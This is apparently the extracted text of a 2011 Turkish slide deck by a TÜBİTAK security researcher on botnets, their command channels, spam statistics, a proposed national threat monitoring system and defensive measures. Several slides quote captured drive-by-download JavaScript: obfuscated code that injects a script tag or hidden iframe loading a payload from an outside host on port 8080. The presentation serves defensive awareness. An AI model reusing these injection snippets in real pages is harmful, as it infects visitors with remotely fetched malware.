Botnetler ve Tehdit Gözetleme Sistemi Botnetler Ve Tehdit Gözetleme Sistemi Necati Ersen ŞİŞECİ Bilişim Sistemleri Güvenliği Gurubu TÜBİTAK BİLGEM UEKAE siseci@uekae.tubitak.gov.tr 16/05/2011
Botnet Nedir? Nasıl Çalışır? Nasıl Bulaşır? Ne Amaçla Kullanılır? Nasıl Yönetilir? Nasıl Tespit Edilir?
Nasıl Bulaşır? Örnek Bulaşma Senaryosu (Drive-by Download)
The Torpig network infrastructure
Ne Amaçla Kullanılır?
Ne Amaçla Kullanılır? Spam Phishing Gizli bilgilerin çalınması DDoS Atakları Malware yükleme ve dağıtımı Tıklama Sahtekarlığı
C&C Mekanizması HTTP Zeus P2P Storm IRC AgoBot, SdBot Diğer protokoller Svelta
C&C Mekanizması Merkezi C&C Dağıtık C&C Botnet C&C Mekanizması ile kullanılan yöntemler (2Q10)
C&C Mekanizması Botnet C&C Mekanizması ile kullanılan yöntemler (2Q10)
C&C Mekanizması Svelta
Zeus Configuration Tool
İstatistikler 2010 un 1 ve 2nci çeyreğinde en çok Microsoft Software Removal Tool Tarafından temizlenen botlar
Spambot İstatistikleri Mart 2011 Mayıs 2011 Lethic: 12.000 60.000 msgs/hour/bot Grum: Mar 2010, 39.9 Billion Spam/day Cutwail: 74 Billion Spam/day
Gündem Tehdit Gözetleme Sistemi nedir? Karşı önlemler Alt yapı gereksinimleri Yapılan Çalışmalar 14
Tehdit Gözetleme Sistemi Servisleri Ulusal Merkezi Saldırı ve Anormallik Tespiti Botnet Tespiti, Engelleme, Ele Geçirme ve Karşı Önlemler Aktif Güvenlik Sağlama Balküpleri İle Güvenlik Önlemleri Raporlama ve İstatistik Çıkarma İnternet Güvenliği Bilgi Deposu Oluşturma
Tehdit Gözetleme Sistemi Servisleri TGS MERKEZİ Sensor Kayıt Sunucuları Web Sunucu Verimadeni Sunucuları Veritabanı Alarmlar Sensor ISP ler
Gerekli Sistem Yetenekleri Veri senkranizasyon Filtreleme Ağ trafik bilgisi Sistem aktivitleri Balküpleri Veritabanı Sunucuları Çıktılar, Raporlar, Alarmlar Veri kaynakları Analiz Prosesleri Analiz Uzmanları
TGS Gündeminden Örnekler Nisan 22, 2009. Finjan ekibi 1.9 milyon birimi yöneten bir botnet tespit etti. Merkez sunucular Ukraynada Gelişmiş bir kullanım arayüzünden sistemler yönetilebilmekte, birimler üzerinde komutlar çalıştırılmakta, kurulum ve web aktiviteleri gerçekleşebilmektedir. Enfekte makinalar forumlarda ticari olarak sunulmakta, takasları yapılmakta Kaynak: http://www.securityfocus.com
TGS Gündeminden Örnekler Kasım, 2009. FireEye ekibi dünyanın spam trafiğinin %4.2 sini üreten Ozdok botnet ini tespit etti. Sunucuların tespit edilmesinin ardından Spam trafiği kesildi. Merkez sunucular çoğunlukla Amerikada. ABD dışında sadece Türkiye ve Israil de sunucuları var. Kaynak: http://www.fireeye.com
TGS Gündeminden Örnekler Eylül, 2009 Hollanda IPS leri Anti-Botnet Anlaşması İmzaladılar. 14 ISP(%98 pazar payı) Hedef; Botnet ve malware tespiti ve engellemesi Temel Maddeler: Anlaşmalı ISP ler arasında ilgili bilgi paylaşımı Enfekte olmuş uçların karantinaya alınması Son kullanıcıların ISP ler tarafından haberdar edilmesi Kaynak: http://www.i-policy.org
Türkiye ve Botnet ler Turkiye, 2008 verilerine göre Dünya da* Botnet lere ev sahipliği yapan ülkeler sıralamasında 8. Spam e-posta üretiminde 5. (2008 in son beş ayında 2.) 2007 de 15. sıradan 2008 de 9. sıraya çıkarak kötü niyetli faaliyetlerin toplamının %3 unun kaynağı durumundadır. (En hızlı yükselen ülke) Yükselen diğer iki ulke, Brezilya ve Polonya dır. İnternet te yer alan kiralık Botnet ilanlarında Turkiye 40 USD / 1000 bilgisayar ile ucuz botnet ligindedir. NATO nun siber savunmadan sorumlu biriminden Türkiye nin DDoS faaliyetlerine karıştığına dair bilgi alınmaktadır. Türkiye nin elindeki bilgisayar parkı, kendi takdiri dışında kullanılabilecek kuvvetli bir silaha dönüşebilmektedir. (*) Symantec Global Internet Security Threat Report. Trends for 2008. Vol. XIV, 2009/4
Botnetlere karşı Yeni İnternet tehditlerinin en belirgin örneği olan botnet lere karşı etkin savunma için: Bireysel, kurumsal ve ulusal etkin güvenlik politikalarına ihtiyaç vardır. Yasal yaptırımlar ve eylem prosedürleri belirlenmelidir. ISP ler kurumlar ve otoriteler arasında etkin bir işbirliği tesis edilmelidir. Virüs tarayıcılar, güvenlik duvarları, lokal saldırı tespiti gibi eski güvenlik önlemleri yetersiz kalmaktadır. Yeni teknolojilerle sistemin tamamının resmedilmesi, analiz edilebilmesi gereklidir.
Botnet i Durdurmak Tespit Botnet aktivitelerinin tespit edilmesi Bot komuta & kontrol merkezlerinin tespit edilmesi Analiz Enfekte sistemler üzerinde analiz yapılması Botnet in kopyalarının analiz edilmesi, zayıflıklarının çıkartılması Önlem Enfekte birimlerin yetkililerine bildirilmesi IPS lerde ilgili ağ veya birimlerin karantinaya alınması Gerektiğinde aktif olarak botnet in engellenmesi
Bizim Çalışmalarımız BGYS Projesi Kapsamında TGS alt yapısı hazırlıkları devam etmektedir. Halen 5 honeypot, 2 IDS, 2 Network Flow sensörü çalışmaktadır. Toplanan veriler ileri araştırma projelerinde de kullanılmak üzere büyük veri depolarında saklanmaktadır. Kendi TGS arayüzlerimiz hazırlanmaktadır.
Muhtemel Çalışma Ortaklarımız ISP'ler ISP'ler üzerinde dinleme yapan sensörler Olay bildirim/müdahele süreçleri, arayüzleri Emniyet Kuvvetleri Olay bildirim/müdahele süreçleri, arayüzleri İletişim İdare Kurumları Hukuki destek Ulusal kapsam ve yaygınlaştırma desteği Araştırma Kurumları Akademik ağlar, sistem yetkilileri Akademik laboratuarlar Virüs, botnet uzmanları Verimadenciliği ve istatistik uzmanları
Örnek Drive-By-Download 'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g# @o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u #)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$ #)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w @$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^ g@$(^o@(^o@g@&$l&&#e^))&@- ($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^ &(i$#@n!#^- #@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o @m^)&/)!c&#(n$)e()&&t)#- ^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#- #))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'
Örnek Drive-By-Download 'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g# @o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u #)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$ #)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w @$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^ g@$(^o@(^o@g@&$l&&#e^))&@- ($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^ &(i$#@n!#^- #@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o @m^)&/)!c&#(n$)e()&&t)#- ^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#- #))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'
Örnek Drive-By-Download Firefox eklentisi FireBug
Örnek Drive-By-Download /*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createelement('script');h3qqea3ur6p.setattribute('type', 'text/javascript');h3qqea3ur6p.setattribute('id', 'myscript1');h3qqea3ur6p.setattribute('src', 'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l ^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#! #)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^ #)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^)) &@- ($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n! #^- #@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)! c&#(n$)e()&&t)#- ^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#- #))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^ & @ \) \( # \! \$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendchild(h3qqea3ur6p);}} catch(e) {}
Örnek Drive-By-Download Bir forumda aldığım uyarı
Örnek Drive-By-Download Rdasznp = 't(&r$$&a#^v^#i&&!^a)n(@^)-!#c@^o(#m!.(#$u^(@#@n($i$($)v!#!i(@#s!&&i)#o&@n!#.##c$o!#!m@.##$!r!o(@b$$t@e()&$)x!(- @c!&o&)m$.$@)@b#l^(u@)(e&()j!$a&c#k^)(i)&(n&)&#.#r&@u$'.repla ce(/\$ # \( & \^ @ \) \!/ig, ''); f = document.createelement('iframe'); f.style.visibility = 'hidden'; f.src = 'http://'+rdasznp+':8080/index.php?js'; document.body.appendchild(f);
Kişisel Olarak Yapılabilecek Önlemler Lisanslı Anti-virüs Yazılımı Kullanmak Anti-virüs yazılımını sürekli güncel tutmak İşletim sistemi güncellemelerini sürekli yapmak Kişisel güvenlik duvarı kullanmak Tanıdığımız kişilerden olsa bile gelen maillerdeki eklentileri mutlaka taratmak USB Belleklerdeki AutoRun virüslerine karşı Autorun ı devre dışı bırakmak Kullandığımız yazılımların (Örneğin: Adobe Acrobat, Adobe Flash Player,Java) güncellemelerini sürekli yapmak. JavaScript ataklarına karşı Firefox u ve eklentisi NoScript i kullanmak. 32
Referanslar Choi, H., Lee, Hanwoo, Lee, Heejo, & Kim, H. (2007). Botnet Detection by Monitoring Group Activities in DNS Traffic. 7th IEEE International Conference on Computer and Information Technology (CIT 2007), 715-720. Ieee. doi: 10.1109/CIT.2007.90. Botnet Detection and Response, David Dagon, 2005, OARC Workshop, Understanding and Blocking the New Botnets, 2008, WatchGuard Feily, M. (2009). A Survey of Botnet and Botnet Detection. doi: 10.1109/SECURWARE.2009.48. Kugisaki, Y., Kasahara, Y., Hori, Y., & Sakurai, K. (2007). Bot Detection Based on Traffic Analysis. The 2007 International Conference on Intelligent Pervasive Computing (IPC 2007), 303-306. Ieee. doi: 10.1109/IPC.2007.91. Towards Next-Generation Botnets, Ralf Hund et all, 2008 European Conference. Richard A. Kemmerer, How to Steal a Botnet and What Can Happen When You Do, 2010 Stone-gross, B., Cova, M., Cavallaro, L., Gilbert, B., Szydlowski, M., Kemmerer, R., et al. (n.d.). Your Botnet is My Botnet : Analysis of a Botnet Takeover. Security. Taking over the Torpig botnet, http://www.cs.ucsb.edu/~seclab/projects/torpig/, Richard A Kemmerer A Controlled Environment for Botnet Traffic Generation, http://www.cse.psu.edu/~tangpong/botnet/, April 2009 Snort-lightweight intrusion detection for networks, Martin Roesch, Usenix 13th, 1999 www.honeynet.org www.tcpdump.org http://www.networksorcery.com/enp/protocol/dns.htm http://www.securelist.com/en/analysis/204792003/the_botnet_business Microsoft Security Intelligence Report (www.microsoft.com/sir) http://www.m86security.com/labs/bot_statistics.asp
Teşekkür K.T.U. Bilgi İşlem Daire Başkanı Yrd. Doç. Dr. Mustafa ULUTAŞ GYTE Bilgisayar Mühendisliği Öğretim görevlisi, Doç. Dr. Hacı Ali MANTAR Ulakbim Müdür Yardımcısı, Sn. Serkan Orcan 34